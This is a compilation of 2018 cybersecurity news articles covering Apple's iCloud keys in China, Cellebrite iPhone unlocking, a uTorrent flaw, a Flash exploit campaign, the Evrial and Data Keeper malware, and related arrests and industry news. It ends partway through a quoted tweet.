The classified data such as online emails, photographs, and messages stay protected from hackers by encryption. And now, Apple will store encryption keys in China instead of the United States of America (Reuters and the Wall Street Journal reports).

It means that the Chinese authorities do not need to go to USA law agencies to force Apple to provide the rights to the data. This step in reaction to newly introduced laws in China, according to which iCloud services offered to the citizens, should secure data within premises of the country and can be used by Chinese organizations.

By the end of the coming month, Apple is going to start transmitting coded information to China and will work closely with a Chinese government. Apple did not say when the encryption data keys would move abroad.

Data protection advocates said, “The change can cause problems for political and other dissidents”.
“Given that Apple is going to work in China, it is unlikely that government can get access to Apple’s data from the local community,” said the professor at the Toronto University, studying the actions of the Chinese government carefully.

Apple says, however, that the data keys stored in a secure place, still Apple will control them. Besides, Apple also claimed that it would provide data only on demand to China’s current legislative requirements and did not create loopholes for access.
Apple’s high-level officer said to news agencies that iCloud is a matter of concern for the recently introduced laws.

The spokeswoman also noted that Apple decision to break the service of iCloud in China would lead to reduced client’s interaction with Apple and would reduce the security and confidentiality of data for Chinese users.
Big multinationals like Microsoft and Amazon also work with Chinese companies to provide cloud storage service and use the vast Chinese market. Two technological giants of USA refused to inform the magazine, where the encryption keys of the company’s data store.
Apple informed the news agencies that they sent a warning about the transition to Chinese iCloud users, which will allow them to disable iCloud to avoid data storage in the country. Apple also told that no one will be touched before accepting new terms of use in China.
Users whose configurations allow another nation like Macao and Hong Kong have not registered their data on servers in China.

The Reuters also includes Taiwan in this list; the newspaper does not do this.
Apple Company and Amazon did not respond to our request for additional comments yet. Microsoft also denied giving any further comments.


Israeli mobile forensics firm Cellebrite can unlock every iPhone device on the market
27.7.2018 securityaffairs Apple

The Israeli mobile forensics firm Cellebrite has designed a technology that allows it to unlock almost any iPhone, including the latest iPhone X.
We have debated for a long time the legal dispute between Apple and the FBI for unlocking the San Bernardino shooter’s iPhone 5c.

The tech giant refused to help the US authorities to unlock the mobile device and the FBI paid over a million dollar to a third-party company to access data contained in the San Bernardino’s shooter’s iPhone.

cellebrite ufed-touch

Such kind of dispute would not happen in the future, the Israeli mobile forensics firm Cellebrite has designed a technology that allows it to unlock almost any iPhone, including the latest iPhone X.

The Israeli mobile forensics firm Cellebrite that is one of the leading companies in the world in the field of digital forensics. The company already works with the principal law enforcement and intelligence agencies worldwide.

Cellebrite provides the FBI with decryption technology as part of a contract signed in 2013, its technology allows investigators to extract information from mobile devices.

The company’s Advanced Unlocking and Extraction Services could be used to unlock every iPhone running iOS 11 and older versions.

“Cellebrite, a Petah Tikva, Israel-based vendor that’s become the U.S. government’s company of choice when it comes to unlocking mobile devices, is this month telling customers its engineers currently have the ability to get around the security of devices running iOS 11.” reads a post published by Forbes.

“That includes the iPhone X, a model that Forbes has learned was successfully raided for data by the Department for Homeland Security back in November 2017, most likely with Cellebrite technology.”

Cellebrite says it advanced services can hack into “Apple iOS devices and operating systems, including iPhone, iPad, iPad mini, iPad Pro and iPod touch, running iOS 5 to iOS 11.”

According to Forbes, anonymous sources confirmed that Cellebrite could also unlock the iPhone 8, and likely the iPhone X.

“a source in the police forensics community told Forbes he’d been told by Cellebrite it could unlock the iPhone 8. He believed the same was most probably true for the iPhone X, as security across both of Apple’s newest devices worked in much the same way.” continues Forbes.

Law enforcement agencies that need to unlock a device (iOS or Android) simply need to send it to the company Labs where a pool of experts will do the job, the service costs as little as $1,500 per unlock.

“In its labs, the company then uses whatever secret exploits it has to crack the lock and either hands it back to investigators so they can take data from the device, or Cellebrite can do that for them. As Forbes previously detailed, this can be relatively inexpensive, costing as little as $1,500 per unlock.” states Forbes.

It also appears the FBI has already tried out Cellebrite service on the latest Apple devices, the iPhone X. According to a warrant viewed by Forbes related to a suspect in an arms trafficking (Abdulmajid Saidi), his iPhone X was sent to a Cellebrite specialist at the DHS Homeland Security Investigations Grand Rapids labs and the data extracted on December 5.

Cellebrite hasn’t commented on the latest report.


Flaw in Popular μTorrent Software Lets Hackers Control Your PC Remotely
27.2.2018 thehackernews
Vulnerebility


If you have installed world's most popular torrent download software, μTorrent, then you should download its latest version for Windows as soon as possible.
Google's security researcher at Project Zero discovered a serious remote code execution vulnerability in both the 'μTorrent desktop app for Windows' and newly launched 'μTorrent Web' that allows users to download and stream torrents directly into their web browser.
μTorrent Classic and μTorrent Web apps run in the background on the Windows machine and start a locally hosted HTTP RPC server on ports 10000 and 19575, respectively, using which users can access its interfaces over any web browser.
However, Project Zero researcher Tavis Ormandy found that several issues with these RPC servers could allow remote attackers to take control of the torrent download software with little user interaction.
According to Ormandy, uTorrent apps are vulnerable to a hacking technique called the "domain name system rebinding" that could allow any malicious website a user visits to execute malicious code on user's computer remotely.

To execute DNS rebinding attack, one can simply create a malicious website with a DNS name that resolves to the local IP address of the computer running a vulnerable uTorrent app.
"This requires some simple DNS rebinding to attack remotely, but once you have the secret you can just change the directory torrents are saved to, and then download any file anywhere writable," Ormandy explained.
Proof-of-Concept Exploits for uTorrent Software Released Publicly

Ormandy also provided proof-of-concept exploits for μTorrent Web and μTorrent desktop (1 and 2), which are capable of passing malicious commands through the domain in order to get them to execute on the targeted computer.
Last month, Ormandy demonstrated same attack technique against the Transmission BitTorrent app.
Ormandy reported BitTorrent of the issues with the uTorrent client in November 2017 with a 90-days disclosure deadline, but a patch was made public on Tuesday—that's almost 80 days after the initial disclosure.
What's more? The re-issued new security patches the same day after Ormandy found that his exploits continued to work successfully in the default configuration with a small tweak.
"This issue is still exploitable," Ormandy said. "The vulnerability is now public because a patch is available, and BitTorrent have already exhausted their 90 days anyway."
"I see no other option for affected users but to stop using uTorrent Web and contact BitTorrent and request a comprehensive patch."
Patch your uTorrent Software NOW!
The company assured its users that all vulnerabilities reported by Ormandy it two of its products had been addressed with the release of:
μTorrent Stable 3.5.3.44358
BitTorrent Stable 7.10.3.44359
μTorrent Beta 3.5.3.44352
μTorrent Web 0.12.0.502
All users are urged to update their software immediately.


Phone-Cracking Firm Found a Way to Unlock Any iPhone Model
27.2.2018 thehackernews Apple

Remember the infamous encryption fight between Apple and the FBI for unlocking an iPhone belonging to a terrorist behind the San Bernardino mass shooting that took place two years ago?
After Apple refused to help the feds access data on the locked iPhone, the FBI eventually paid over a million dollar to a third-party company for unlocking the shooter's iPhone 5c.
Now, it appears that the federal agency will not have to fight Apple over unlocking iPhones since the Israeli mobile forensics firm Cellebrite has reportedly figured out a way to unlock almost any iPhone in the market, including the latest iPhone X.
Cellebrite, a major security contractor to the United States law enforcement agencies, claims to have a new hacking tool for unlocking pretty much every iPhone running iOS 11 and older versions, Forbes reports.
In its own literature [PDF] "Advanced Unlocking and Extraction Services," Cellebrite says its services can break the security of "Apple iOS devices and operating systems, including iPhone, iPad, iPad mini, iPad Pro and iPod touch, running iOS 5 to iOS 11."
Citing anonymous sources, the publication reported that Cellebrite could also unlock the iPhone 8, and since the security across Apple's newest iPhone devices worked in much the same way, the company can break the security of the iPhone X as well.
Besides Apple's devices, Cellebrite can also break into Google Android-powered smartphones from Samsung (Galaxy and Note series), Alcatel, Google Nexus, HTC, Huawei, LG, Motorola, ZTE and many more.
"Cellebrite Advanced Unlocking Services is the industry's only solution for overcoming many types of complex locks on market-leading devices," Cellebrite literature explains.
"This can determine or disable the PIN, pattern, password screen locks or passcodes on the latest Apple iOS and Google Android devices."
Last November, the Department of Homeland Security reportedly managed to get into an iPhone X owned by a suspect in an arms trafficking case, probably with the help of a Cellebrite-trained specialist.
However, a warrant discovered by Forbes does not mention the method or technology used by law enforcement to hack into the iPhone X.
Founded in 1999, Cellebrite provides digital forensics tools and software for mobile phones to its customers, which also includes the US government.
One of its main products is the Universal Forensic Extraction Device (UFED) that claims to help investigators extract all data and passwords from mobile phones.
While the Cellebrite's iPhone hacking tool has the potential to affect hundreds of millions of Apple users, Apple also rolls out software updates and patches on a regular basis.
So users are advised to keep their devices up-to-date, as its hard to say if the company's hacks work on the latest updates of iOS 11.
Neither Cellebrite nor Apple immediately commented on the latest report.


Android P Will Block Background Apps from Accessing Your Camera, Microphone
27.2.2018 thehackernews Android

Yes, your smartphone is spying on you. But, the real question is, should you care?
We have published thousands of articles on The Hacker News, warning how any mobile app can turn your smartphone into a bugging device—'Facebook is listening to your conversations', 'Stealing Passwords Using SmartPhone Sensors', 'Your Headphones Can Spy On You' and 'Android Malware Found Spying Military Personnel' to name a few.
All these stories have different objectives and targets but have one thing in common, i.e., apps running in the background covertly abuse ‘permissions’ without notifying users.
Installing a single malicious app unknowingly could allow remote attackers to covertly record audio, video, and taking photos in the background.
But, not anymore!
In a boost to user privacy, the next version of Google's mobile operating system, Android P, will apparently block apps idling in the background from accessing your smartphone's camera and microphone.
According to the Android Open Source Project (AOSP) commit, Google is working on two built-in features in Android P to protect its users from malicious apps spying on them using smartphones’ camera or microphone.
First spotted by XDA developers, the source code commit for both the camera and microphone changes notes that apps that are "idle" (aka running in the background) "for more than a certain amount of time" without specifying themselves will not be able to use the microphone or camera.
To do so, the Android P mobile operating system would target something known as an app's User ID (UID)—a unique ID assigned to an app when a user downloads it on his/her Android device that cannot be altered and are permanent until the app is uninstalled.
Android P would keep an eye on the app’s UID and block it from accessing the camera and microphone in any way whenever that UID is idle. Repeated attempts of requesting access to the camera would generate errors.
However, microphone-using apps will not be cut off from the microphone, but will "report empty data (all zeros in the byte array), and once the process goes in an active state, we report the real mic data."
It should also be noted that users talking on the smartphone while using other apps will not have to worry about these new features because the dialer application went into the background while active.
Imposing such limitations on apps would surely alleviate spying fears for Android users as of today when advertisers misuse such features to listen in on app users and Android malware capable of capturing audio, video, and images in the background are out there, for example, Skygofree and Lipizzan.
Android P is still in development and is not yet named. The company seems to release the next major version of Android in this year's Google I/O developer conference that will take place from May 8 to May 10 at the Shoreline Amphitheatre in Mountain View, California.


North Korea's Flash Player Flaw Now Exploited by Cybercriminals
27.2.2018 securityweek BigBrothers

Endpoint security firm Morphisec has spotted a massive campaign that exploits a recently patched Adobe Flash Player vulnerability to deliver malware.

The flaw in question, CVE-2018-4878, is a use-after-free bug that Adobe patched on February 6, following reports that North Korean hackers had been exploiting the vulnerability in attacks aimed at South Korea. The threat group, tracked as APT37, Reaper, Group123 and ScarCruft, has been expanding the scope and sophistication of its campaigns.

After Adobe patched the security hole, which allows remote code execution, other malicious actors started looking into ways to exploit CVE-2018-4878.

Morphisec said it spotted a campaign on February 22, which had been using a version of the exploit similar to the one developed by APT37. However, researchers pointed out that the exploit in the malspam campaign, unlike the one used in the original attacks, did not have a 64-bit version.

The attack starts with a spam email containing a link to a document stored on safe-storage[.]biz. Once downloaded and opened, the document informs users that an online preview is not available and instructs them to enable editing mode in order to view the content.

If users comply, the Flash vulnerability is exploited and the Windows command prompt is executed. The associated cmd.exe file is then injected with malicious shellcode that connects to the attacker’s domain.

A DLL file is then downloaded by the shellcode and executed using the Microsoft Register Server (regsvr32) utility. The legitimate tool is abused in an effort to bypass whitelisting products.

The malicious documents and the Flash exploit were only detected by a few security solutions based on their signature at the time of Morphisec’s analysis.

Since the URLs included in the spam emails were created using Google’s URL shortening service, researchers determined that each of the different links delivered in this campaign had been clicked tens and even hundreds of times within 3-4 days of being created. Users clicked on the links from various browsers and email services, including Outlook, Gmail and Aruba.it.

“As expected and predicted, adversaries have quickly adopted the Flash exploit, which is easily reproducible,” Morphisec’s Michael Gorelik explained in a blog post. “With small variations to the attack, they successfully launched a massive malspam campaign and bypassed most of the existing static scanning solutions once again.”


Evrial: The Latest Malware That Steals Bitcoins Using the Clipboard
27.2.2018 securityaffairs
Virus

Evrial is a cryptocoin malware stealer discovered by the researchers at ElevenPaths which takes control of the clipboard to get “easy money”.
Evrial is a cryptocoin malware stealer which takes control of the clipboard to get “easy money”.

ElevenPaths has taken a deep technical dive into the malware itself, to show how it technically works, with a quite self-explanatory video. Aside, we have followed the steps of its Russian creator and found that his scam has been targeting other scammers themselves.

Evrial

By the end of 2017, CryptoShuffle was a malware sample capable of reading the clipboard and modifying cryptocurrency addresses found there. Later, someone realized that there could be some business on providing these features as a service and started to sell the platform itself calling it “Evrial”. The product was formed by a .NET malware sample capable of stealing passwords from browsers, FTP clients, Pidgin and it could also modify the clipboard on the fly so as to change any copied cryptocurrency address to whatever address he wanted to.

Evrial allows the attacker to control it all from a comfortable panel where the stolen data can be easily explored. When the attacker buys the application, he can set his “name” for logging into the panel which will be hardcoded in the code, so that the shipped Evrial version is unique for him.

When you want to make a Bitcoin transfer, you usually copy and paste the destination address. In this sense, the attacker waits until the user, trusting in the clipboard action, sends a new transaction to the copied cryptocurrency address, without knowing that the recipient’s address has been silently modified to one that belongs to the attacker. The malware performs this task in the background for different types of address including Bitcoin, Litecoin, Ethereum and Monero addresses as well as for Steam identifiers and Webmoney WMR and WMZ units.

The author exposes his username in Telegram: @Qutrachka. The account is in the source code in order to be able to contact him. Using this information and some other analysed samples, it has been possible to identify users in different deep web forums under the name Qutra whose main objective: sell this malicious software. There are also evidences that CryptoSuffer malware was linked to the same threat actor after identifying a publication in Pastebin explaining the functionalities of this family and published under the same user.

We are able to guess how much it is in every wallet. He has received a total of 21 transactions into the Bitcoin wallet, supposedly from his victims, collecting approximately 0.122 BTC. If ransomware wallets usually receive the same amount from its victims, here the range is wider because the legitimate payments that the victim wants to do are, of course, of different amounts.


The attacker has moved all the money to several addresses to try to blur the trail of his payments. The attacker has received 0.0131 Litecoins as well, but this amount is still available in his wallet. On the other hand, it has not been possible to track any payments related to his Monero account because of how this technology works so as to hide the information of which parties have been involved in each operation. At the same time, we could not find out any additional information linked to his various Webmoney accounts (WMR and WMZ). Anyway, what is clear is that this type of malicious behavior is technically viable while it is being used in the wild.


Line Between Nation-State, Criminal Hackers Increasingly Blurred: Report
26.2.2018 securityweek Crime

The line between the level of sophistication typically exhibited by state-sponsored threat groups and cybercriminals became increasingly blurred in the past year, according to CrowdStrike’s 2018 Global Threat Report.

CrowdStrike has analyzed various aspects of the cybersecurity landscape in the past year, including targeted attacks launched by nation state actors, the tools and operations of cybercriminals, hacktivism, law enforcement campaigns, and the effectiveness of attacks and defense mechanisms.

According to the security firm, there are several factors that led to the leveling of the playing field, but one of the most significant is the so-called “trickle-down effect.” This product adoption model states that a product initially too expensive for the masses eventually gets cheap enough for the general public to acquire.

Applying this model to the cybersecurity scene, we have the EternalBlue exploit, which is believed to have been developed by the U.S. National Security Agency (NSA), getting leaked by a group named Shadow Brokers. This has allowed other state-sponsored attackers – including in the WannaCry and NotPetya attacks believed to have been launched by North Korea and Russia – and profit-driven cybercriminals to use the exploit to accomplish their own goals.

On one hand, attacks such as the ones involving NotPetya and WannaCry malware have inspired cybercriminals, giving them ideas on how to maximize profits. On the other hand, state-sponsored actors have also taken inspiration from cybercriminals – both the NotPetya and WannaCry attacks were made to appear as if they were ransomware campaigns launched by profit-driven criminals.

Sophisticated supply chain attacks have been typically used by nation state groups, but last year saw several incidents that did not appear to be the work of state-sponsored cyberspies.

One incident involved rogue Python libraries being uploaded to the Python Package Index (PyPI). While the libraries included malicious code, it actually turned out to be benign, which has led some experts to believe that it may have been the work of a grey hat hacker.

Other incidents involved a piece of macOS malware called ProtonRAT, which attackers managed to deliver last year on at least two occasions after compromising websites hosting popular video conversion and media player apps. Operation WilySupply analyzed by Microsoft also falls into this category.

The list of supply chain attacks attributed to state-sponsored groups last year included the CCleaner and NetSarang incidents, which some linked to China, and the NotPetya campaign, whose initial infection vector was an updater for a Ukrainian tax accounting application.

“CrowdStrike's report is just one more in a long line of publications that demonstrates the increasing futility of technical attribution. The largest detriment of this trend of nation states hiding in the hacking noise is that the security industry no longer can have confidence in its traditional technical attribution models. Relying on code usage and IPs in a world where we know tool kits and techniques are shared, stolen, and sold amongst hackers is a recipe for misattribution,” Ross Rustici, senior director of intelligence services at Cybereason, commented on the CrowdStrike report.

“Hackers, especially the higher tier have proven time and again that they are capable and willing to play on cybersecurity's habit of confirmation bias by using false flags to point the community in the direction of a particular nation state or criminal group that is either: 1) currently the most talked about group making which plays into the self interest of the company of finding something that already garners a lot of media and PR attention; or 2) plays to the nationalism of the victim,” Rustici added.


NanoCore RAT Creator Sentenced to Prison
26.2.2018 securityweek
Virus

A Hot Springs, Arkansas man who last year admitted in court to creating the NanoCore RAT (Remote Access Trojan) was sentenced to 33 months in prison.

Taylor Huddleston, 27, was sentenced on Friday for helping and assisting with computer intrusions through the development and marketing of malicious software, the Department of Justice announced. The programs he created were used to steal sensitive data from victims, spy on them, and conduct other illegal intrusions.

In addition to the 33 months in prison, Huddleston was ordered to serve two years of supervised release following his prison sentence.

Accused of developing, marketing, and distributing two malware families, Huddleston pleaded guilty in court in July 2017.

The first malicious program Huddleston developed is the NanoCore RAT, a backdoor that allows attackers to steal information from victim computers, including passwords, emails, instant messages, and other sensitive data. Used to infect and attempt to infect tens of thousands of systems, the RAT allows attackers to activate infected machines’ webcams to spy on victims.

NanoCore RAT was used in attacks targeting the finance departments of small and medium-sized businesses in the U.K., the U.S. and India, as well as in other global infection campaigns. Distribution methods included, among others, fileless tricks to the abuse of free Voice-over-IP (VoIP) service Discord.

Huddleston also admitted to creating Net Seal, licensing software that allowed him to distribute malware for co-conspirators for a fee. Huddleston is said to have used Net Seal to assist Zachary Shames in his attempt to infect 3,000 systems with malware that was in turn used to infect 16,000 computers.

Huddleston built Net Seal in 2012 and created NanoCore in 2014 (he marketed the RAT as a remote desktop management utility.

In his guilty plea last year, Huddleston admitted that he intended the programs to be used maliciously.


PhishMe Acquired at $400 Million Valuation, Rebranded as Cofense
26.2.2018 securityweek
Phishing

Private Equity Deal Values Cofense at $400 Million

PhishMe, a security awareness firm that focuses on training employees on how to recognize and report phishing attacks, has been acquired by a private equity consortium in a deal that valued the company at $400 Million.

The company has also re-branded and changed its name to Cofense.

“PhishMe was founded to challenge the cliché - human is the weakest link,” said Rohyt Belani, CEO and Co-Founder of Cofense. “The Cofense solution set leverages internal employee-generated attack intelligence in concert with purpose-built response technologies to break the attack kill chain at delivery. Cofense reflects the full breadth of our portfolio of enterprise-wide attack detection, response, and orchestration solutions.”

Cofense LogoThe company says it currently has more than 1700 customers globally and that its PhishMe Reporter is installed on more 10 million endpoints.

In a recent survey by the Financial Services Information Sharing and Analysis Center (FS-ISAC) that polled more than 100 of its 7,000 global members, thirty-five percent of CISOs in the financial sector consider staff training to be the top priority for cyber defense.

“With cybersecurity a top priority for organizations everywhere, our goal is to continue bringing innovative products to markets around the globe to help stop active attacks faster than ever,” Belani added.

Cofense says it has experienced roughly 80% CAGR over the last four years, and has new offices opening in Australia, Singapore, Dubai, and Saudi Arabia.

The company has previously raised a total of roughly $58 million, including a large $42.5 million funding round in July 2016. The company had raised $2.5 million in July 2012 in a Series A round, followed by $13 Million in a Series B funding round in March 2015.

Security awareness firms have been the subject of significant funding and M&A transactions in recent months.

Earlier this month, security awareness training firm Wombat Security agreed to be acquired by Proofpoint for $225 million in cash. In August 2017, Webroot acquired Securecast, an Oregon-based company that specializes in security awareness training. In October 2017, security awareness training and simulated phishing firm KnowBe4 secured $30 million in Series B financing, which brought the total amounbt raised by KnowBe4 to $44 million. Security awareness training firm PhishMe has raised nearly $58 million in funding, including a $42.5 million series C funding round in July 2016.


Researchers Propose Improved Private Web Browsing System
26.2.2018 securityweek Privacy

A group of researchers from MIT and Harvard have presented a new system designed to make private browsing even more private.

Dubbed Veil, the system proposes additional protections for people who share computers with other people at the office, in hotel business centers, or university computing centers. The new system, the researchers claim, can be used in conjunction with existing private-browsing systems and anonymity networks. The system works even if users don’t visit a page using a browser’s native privacy mode.

In a paper (PDF) describing Veil, Frank Wang – MIT Computer Science and Artificial Intelligence Laboratory (CSAIL), Nickolai Zeldovich – MIT CSAIL, and James Mickens – Harvard, explain that the system is meant to prevent information leaks “through the file system, the browser cache, the DNS cache, and on-disk reflections of RAM such as the swap file.”

The researchers explain that existing private-browsing sessions rely on retrieving data, loading it into memory, and attempting to erase it when the session is over. However, because of a complex memory management process, some data could end up on a hard drive, where it could remain for days, with the browser not knowing what happened to that data.

The newly proposed system keeps all the data that the browse loads into memory encrypted until it is displayed on the screen, the researchers say. Users no longer type a URL into the browser, but access the Veil website and enter the URL there. With the help of a blinding server, the Veil format of the requested page is transmitted.

While the Veil page can be displayed in any browser, there is a bit of code in the page that executes a decryption algorithm and all of the data associated with the page is unreadable until it goes through that algorithm, the researchers say.

The system would also add decoy, meaningless code to every served page, so that the underlying source file is modified without affecting the way the page looks to the user. With no two transmissions of a page by the blinding sever similar, an attacker capable of recovering snippets of decrypted code after a Veil session should not be able to determine what page the user had visited.

“The blinding servers mutate content, making object fingerprinting more difficult; rewritten pages also automatically encrypt client-side persistent storage, and actively walk the heap to reduce the likelihood that in-memory RAM artifacts will swap to disk in cleartext form. In the extreme, Veil transforms a page into a thin client which does not include any page-specific, greppable RAM artifacts,” the paper reads.

One other option would be to have the blinding server opening the requested page itself, taking a picture of it, and sending the picture to the user’s computer. Should the user click anywhere on the image, the browser records the position of the click and sends the data to the server, which processes it and returns an image of the updated page.

Veil uses an opt-in model, meaning that the use of the new private browsing system requires developers to create Veil versions of their sites. To help in this regard, the researchers built a compiler to help admins convert sites automatically and is also capable of uploading the converted version of a site to a blinding server.

“To publish a new page, developers pass their HTML, CSS, and JavaScript files to Veil’s compiler; the compiler transforms the URLs in the content so that, when the page loads on a user’s browser, URLs are derived from a secret user key. The blinding service and the Veil page exchange encrypted data that is also protected by the user’s key. The result is that Veil pages can safely store encrypted content in the browser cache; furthermore, the URLs exposed to system interfaces like the DNS cache are unintelligible to attackers who do not possess the user’s key,” the paper reads.

The blinding servers, however, require maintenance, either by a network of private volunteers or a for-profit company. However, site admins would also have the option to host Veil-enabled versions of their sites themselves.


Ukraine Arrests 'Avalanche' Cybercrime Organizer: Police
26.2.2018 securityweek CyberCrime

Ukraine has detained one of the organizers of the massive Avalanche cybercrime network, police said on Monday, over a year after the global ring was busted in an international raid.

"An organizer of the international crime platform known as 'Avalanche' which infected up to half a million computers in the world daily was detained in Kiev Sunday," Ukraine's cyber police said in a statement.

Avalanche was a criminal network providing infrastructure for malware and DDoS (distributed denial of service) spam attacks across the world before it was busted in an unprecedented global sting operation.

Speaking to AFP, a cyber police spokeswoman confirmed the arrested man was Gennadiy Kapkanov, a Ukrainian citizen who was using a passport with a different identity.

Police also searched his rented flat, seizing a laptop and memory storage devices, it said.

In November 2016, police from more than 25 countries smashed the network and arrested its top bosses following a four-year operation.

Hundreds of servers were shut down or seized and 800,000 internet domains were blocked, Europol said at the time, in one of the biggest takedowns to date.

During the operation, Kapkanov was also detained in the sting at his home in Poltava, a city in central Ukraine, but the local court did not formally arrest him and he disappeared, Ukrainian media said.

Later on Monday, the same court will have to rule again on whether to formally place Kapkanov under arrest.


VISA – The adoption of chip-and-PIN card technology lead to 70% Drop in Counterfeit Fraud
26.2.2018 securityaffairs Crime

VISA – The cases of counterfeit fraud had dropped by 70% in September 2017 compared to December 2015 thanks to the diffusion of the diffusion in the storefronts of payment systems for EMV cards.
The introduction of chip-and-PIN card technology in the United States improved in a significant way the security of merchants and has reduced payment card fraud.

The cases of counterfeit fraud had dropped by 70% in September 2017 compared to December 2015 thanks to the diffusion of the diffusion in the storefronts of payment systems for EMV cards.

“For merchants who have completed the chip upgrade, counterfeit fraud dollars
EMV chip cards and chip-activated merchants combat counterfeit fraud in the U.S.
December 2017 Visa Chip Card Update in September 2017 compared to December 2015″ states VISA.

The process started in 2011 with the introduction of EMV (Europay, MasterCard, Visa) card technology in the United States.

The process was very slow, according to Visa, by September 2015, only roughly 392,000 merchants were accepting payment card using the new technology. at the same period, the number of Visa debit and credit cards using the EMV technology was only at 159 million.

Now Visa has shared data related to the adoption of the EMV technology by December 2017. The number of storefronts that currently accept payments with chip cars has reached 2.7 million in the U.S. (+570%), representing 59% of the total.

VISA DATA

The number of Visa payment cards using EMV technology increased passed from 159 million to 481 million (202%), with 67% of Visa payment cards having chips.

It is an excellent result, according to VISA Chip transactions continue to increase in the US. EMV cards accounted for 96% of the overall payment volume in the United States in December 2017, with chip payment volume reaching $78 billion.

VISA data 3

Cybercriminals have responded to the adoption of EMV chip cards focusing their efforts on card-not-present (CNP) fraud had that is today a serious concern for merchants.


Chip Cards Lead to 70% Drop in Counterfeit Fraud: Visa
26.2.2018 securityweek Crime

The adoption of chip-and-PIN card technology by an increasing number of merchants in the United States has led to a significant drop in cases of counterfeit card fraud, according to Visa.

The financial industry has been pushing for the adoption of EMV (Europay, MasterCard, Visa) card technology in the United States since 2011, and efforts were increased following the disclosure of the massive data breach suffered by Target in 2013.

However, according to Visa, by September 2015, only roughly 392,000 merchant locations had been accepting chip cards, and the number of Visa debit and credit cards using this technology was only at 159 million.

Data collected by Visa shows the number of storefronts that had migrated to EMV technology by December 2017 increased by more than 570%, with 2.7 million storefronts in the U.S., representing 59% of the total, accepting chip cards. The number of Visa cards using chip technology increased by 202% to 481 million, with 67% of Visa payment cards having chips.

Visa also reported that EMV cards accounted for 96% of the overall payment volume in the United States in December 2017, with chip payment volume reaching $78 billion.

As a result of U.S. merchants upgrading their payment systems for EMV cards, cases of counterfeit fraud had dropped by 70% in September 2017 compared to December 2015.

While the adoption of chip and PIN technology addresses the problem of counterfeit card fraud, it has not deterred fraudsters, who have simply shifted their focus to card-not-present (CNP) and other types of fraud.

A study released roughly one year ago by Forter showed that there had been a significant increase in CNP fraud and account takeover (ATO) attacks. Specifically, in the case of ATO, while the number of attacks targeting merchant sites had decreased, there had been a growing trend in ATO attacks on online payment accounts.

A study released in September 2017 by Vesta showed that CNP fraud had been a serious concern for 85% of merchants, with roughly one-third showing increased concern.

Torsten George, strategic advisory board member at vulnerability risk management firm NopSec, warned in a SecurityWeek column last year that EMV does not address more sophisticated cyber attacks that target backend systems storing cardholder data.

“Security is no longer just about protecting the network and endpoints, but must extend to the database and application layers to name a few,” George explained at the time. “That’s why, in addition to their work to advance EMV adoption, banks and payment processors should implement cyber risk management practices to identify their attack surface exposure and quickly prioritize remediation of the security gaps with the potential to have the biggest business impact if exploited.”


Pyeongchang – Russia’s GRU military intelligence agency hacked Olympics Computers
26.2.2018 securityaffairs BigBrothers

Pyeongchang – Russia’s GRU military intelligence agency hacked Olympics Computers conducted a false flag operation to make it appear the attack originated in North Korea.
On February 9, shortly before the Pyeongchang opening ceremonies on Friday, televisions at the main press centre, wifi at the Olympic Stadium and the official website were taken down.

According to The Washington Post, the incidents were caused by cyber attacks powered by hackers working at Russia’s GRU military intelligence agency that managed to take control in early February of 300 computers linked to the Olympic organization.

The cyber attacks were a retaliation against the International Olympic Committee for banning the Russian team from the Winter Games due to doping cases of Russian athletes.

“Analysts surmise the disruption was retaliation against the International Olympic Committee for banning the Russian team from the Winter Games due to doping violations. No officials from Russia’s Olympic federation were allowed to attend, and while some athletes were permitted to compete under the designation “Olympic Athletes from Russia,” they were unable to display the Russian flag on their uniforms and, if they won medals, their country’s anthem was not played.” reported The Washington Post.

“As of early February, the Russian military agency GRU had access to as many as 300 Olympic-related computers, according to an intelligence report this month.

The Office of the Director of National Intelligence declined to comment.”

Pyeongchang Olympic Games

The cyber attacks caused severe problems to the Olympic organization, many attendees were unable to print their tickets for the ceremony and were not able to participate the event.

According to the authorities, it is a sabotage, Russian cyber soldiers compromised South Korean computer routers and implanted a strain of “malware” that paralyzed the network.

In order to make hard the attribution of the attack, Russian hackers conducted a false flag operation to make it appear the attack originated in North Korea.

“Russian military spies hacked several hundred computers used by authorities at the 2018 Winter Olympic Games in South Korea, according to U.S. intelligence.” continues the Washington Post.

“They did so while trying to make it appear as though the intrusion was conducted by North Korea, what is known as a “false-flag” operation, said two U.S. officials who spoke on the condition of anonymity to discuss a sensitive matter.”


Data Keeper Ransomware – An unusual and complex Ransom-as-a-Service platform
26.2.2018 securityaffairs
Ransomware

The Data Keeper Ransomware that infected systems in the wild was generated by a new Ransomware-as-a-Service (RaaS) service that appeared in the underground recently.
A few days ago a new Ransomware-as-a-Service (RaaS) service appeared in the underground, now samples of the malware, dubbed Data Keeper Ransomware, generated with the platforms are have already been spotted in the wild.

The Data Keeper ransomware was discovered by researchers at Bleeping Computer last week.

View image on Twitter
View image on Twitter

Catalin Cimpanu
@campuscodi
New Dark Web RaaS. Currently offline, but to keep an eye on.

http://3whyfziey2vr4lyq[.]onion

4:24 PM - Feb 20, 2018
18
See Catalin Cimpanu's other Tweets
Twitter Ads info and privacy
“The service launched on February 12 but didn’t actually come online until February 20, and by February 22, security researchers were already reporting seeing the first victims complaining of getting infected.” reads the blog post published by Bleeping Computer.

Anyone can sign up for the RaaS service and activate his account for free and create their samples of the ransomware.

The ransomware encrypted the files with a dual AES and RSA-4096 algorithm, it also attempts to encrypt all networks shares. Once the files are encrypted, the malicious code will place a ransom note (“!!! ##### === ReadMe === ##### !!!.htm“) in each folder it will encrypt files.

The operators behind the Data Keeper RaaS request their users to generate their samples and distribute them, in turn, they offer a share of the ransom fee when victims pay the ransom. It is not clear the percentage of the ransom that is offered to the user.

Affiliates just need to provide the address of their Bitcoin wallet, generate the encryptor binary, and download the malware along with a sample decrypter.

According to the researchers at the MalwareHunterTeam who analyzed the ransomware, even if it is written in .NET language, its quality is high.


MalwareHunterTeam
@malwrhunterteam
So, looked at DataKeeper ransomware...
Important / notable things:
- it's secure
- it's one of the few RWs that uses PsExec & it should be the 1st .NET RaaS that uses PsExec at all
- not seen any .NET ransomware before which was protected like this.@BleepinComputer @demonslay335

8:40 PM - Feb 22, 2018
35
29 people are talking about this
Twitter Ads info and privacy
22 Feb

MalwareHunterTeam
@malwrhunterteam
So, looked at DataKeeper ransomware...
Important / notable things:
- it's secure
- it's one of the few RWs that uses PsExec & it should be the 1st .NET RaaS that uses PsExec at all
- not seen any .NET ransomware before which was protected like this.@BleepinComputer @demonslay335


MalwareHunterTeam
@malwrhunterteam
The ITW sample we seen yesterday consists of 4 layers:
